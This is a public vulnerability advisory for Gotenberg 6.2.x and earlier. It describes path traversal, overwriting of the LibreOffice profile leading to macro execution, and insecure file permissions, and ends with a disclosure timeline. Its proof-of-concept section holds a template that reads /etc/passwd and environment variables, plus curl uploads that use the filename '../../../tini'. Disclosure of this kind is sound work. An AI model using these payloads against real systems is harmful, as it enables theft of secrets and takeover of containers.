An incomplete-cleanup vulnerability in the Office rendering engine of Gotenberg through 6.2.1 allows an attacker to overwrite LibreOffice configuration files and execute arbitrary code via macros.
Packet Storm record: Gotenberg 6.2.0 Traversal / Code Execution / Insecure Permissions
Published: 2021-01-04
CVEs: CVE-2020-13449, CVE-2020-13450, CVE-2020-13451, CVE-2020-13452
Record: https://packetstormsecurity.com/files/160744/Gotenberg-6.2.0-Traversal-Code-Execution-Insecure-Permissions.html
Original advisory text: https://packetstormsecurity.com/files/download/160744/gotenberg620-traversalexec.txt

1 Multiple vulnerabilities in Gotenberg <= 6.2.0
════════════════════════════════════════════════

Multiple vulnerabilities in Gotenberg (a Docker-powered stateless API
for converting HTML, Markdown and Office documents to PDF, used as a
microservice) version <=6.2.0 allow a remote unauthenticated attacker
to execute any command within the Docker container.

CVSSv3.1 chained score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Disclosure summary: [https://sploit.tech/2020/12/29/Gotenberg.html]

Write-up: [https://blazej-adamczyk.medium.com/0-day-bug-breaks-multi-million-dollar-system-38c9e31b27e9]

Exploit code: [https://github.com/br0xpl/gotenberg_hack]

Video: [https://youtu.be/NAv8qovLtgI]


1.1 Download directory traversal
────────────────────────────────

CVE: CVE-2020-13449

Vendor: [https://www.thecodingmachine.com]

Product: Gotenberg ([https://github.com/thecodingmachine/gotenberg])

Version: <=6.2.1

Description: A directory traversal vulnerability in the Markdown engine of
Gotenberg version 6.2.1 and lower allows an unauthorized attacker to read
any file in the container.

PoC:
1. Create an index.html file:
┌────
│ <!doctype html>
│ <html lang="en">
│ <head>
│ <meta charset="utf-8">
│ <title>My PDF</title>
│ </head>
│ <body>
│ <pre style="white-space: pre-wrap;">
│ Path:
│ {{ .DirPath }}
│ PASSWD:
│ {{ toHTML .DirPath "../../../../etc/passwd" }}
│ IP:
│ {{ toHTML .DirPath "../../../../proc/net/fib_trie" }}
│ TCP:
│ {{ toHTML .DirPath "../../../../proc/net/tcp" }}
│ env:
│ {{ toHTML .DirPath "../../../../proc/self/environ" }}
│ </pre>
│ </body>
│ </html>
└────
2. Call the markdown endpoint:
┌────
│ $ curl 'http://$URL_GOTENBERG/convert/markdown' --form files=@index.html \
│ -o result.pdf --header 'Content-Type: multipart/form-data'
└────


1.2 Upload directory traversal
──────────────────────────────

CVE: CVE-2020-13450

Vendor: [https://www.thecodingmachine.com]

Product: Gotenberg ([https://github.com/thecodingmachine/gotenberg])

Version: <=6.2.1

Description: A directory traversal vulnerability in the file upload function
of Gotenberg version 6.2.1 and lower allows an unauthorized attacker to
upload and overwrite any writable file outside the intended folder.

This can lead to denial of service, changed program behaviour, or even
code execution (see CVE-2020-13451).

PoC:
┌────
│ curl 'http://$URL_GOTENBERG/convert/markdown' --form files=@index.html \
│ --form "files=@tini;filename=../../../tini" -o res.pdf \
│ --header 'Content-Type: multipart/form-data'
└────


1.3 Code execution via incomplete cleanup
─────────────────────────────────────────

CVE: CVE-2020-13451

Vendor: [https://www.thecodingmachine.com]

Product: Gotenberg ([https://github.com/thecodingmachine/gotenberg])

Version: <=6.2.0

Description: An incomplete cleanup vulnerability in the Office rendering
engine of Gotenberg version 6.2.1 and lower allows an unauthorized
attacker (using a different vulnerability such as CVE-2020-13450) to
overwrite LibreOffice config (profile) files and execute arbitrary
code using macros.

When the office endpoint is called, Gotenberg creates a LibreOffice
profile under tmp, in a folder whose name is derived from a random
ephemeral port number chosen by the kernel. Most importantly, the
profile folder is not removed after the request finishes. Thus, using
a file upload vulnerability like the one described in CVE-2020-13450,
an attacker can modify the profile to plant a macro that will be
executed the next time the same random profile is reused.

Analysis of the kernel sources shows that, with the default kernel
configuration, the port is chosen at random from about 14115 values.
The attack therefore requires many retries, but works reliably.

Exploit code: [https://github.com/br0xpl/gotenberg_hack]


1.4 Insecure permissions of main executable
───────────────────────────────────────────

CVE: CVE-2020-13452

Vendor: [https://www.thecodingmachine.com]

Product: Gotenberg ([https://github.com/thecodingmachine/gotenberg])

Version: <=6.2.1

Description: The /tini file is writable by the gotenberg user; these
insecure permissions potentially allow an attacker to overwrite the
file, which can lead to denial of service or even code execution.


2 Timeline
══════════

• 25.05.2020 - Reported the issue:
[[https://github.com/thecodingmachine/gotenberg/issues/199]].
• 04.06.2020 - Author confirms the issues and works on a fix.
• 05.06.2020 - Pull request
[[https://github.com/thecodingmachine/gotenberg/pull/208]] created.
• 22.06.2020 - Fix merged into version 6.3.0.


3 Credits
═════════

Author: Blazej Adamczyk | [https://sploit.tech/]

Team: Efigo [https://efigo.pl/]